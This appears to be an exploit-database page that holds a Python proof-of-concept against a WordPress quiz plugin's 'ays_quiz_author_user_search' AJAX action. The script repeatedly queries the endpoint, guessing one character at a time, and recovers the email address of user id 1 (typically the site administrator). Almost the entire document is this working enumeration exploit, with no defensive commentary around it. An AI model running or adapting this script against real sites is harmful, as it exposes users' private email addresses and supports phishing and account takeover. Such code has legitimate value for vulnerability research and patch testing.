Share
## https://sploitus.com/exploit?id=WPEX-ID:C62BE802-E91A-4BCF-990D-8FD8EF7C9A28
import string
import requests

base_url = 'http://127.0.0.1:8001/wp-admin/admin-ajax.php?action=ays_quiz_author_user_search&search='
id_to_find = 1
letter_candidates = string.ascii_lowercase + string.digits + '-_.'

email = '@'

# Find letters after @
while True:
    print("current email", email)
    for letter in letter_candidates:
        query = email + letter
        data = requests.get(base_url + query).json()
        if id_to_find in [item['id'] for item in data['results']]:
            email = query
            break
    else:
        break
# Find letters before @
while True:
    print("current email", email)
    for letter in letter_candidates:
        query = letter + email
        data = requests.get(base_url + query).json()
        if id_to_find in [item['id'] for item in data['results']]:
            email = query
            break
    else:
        break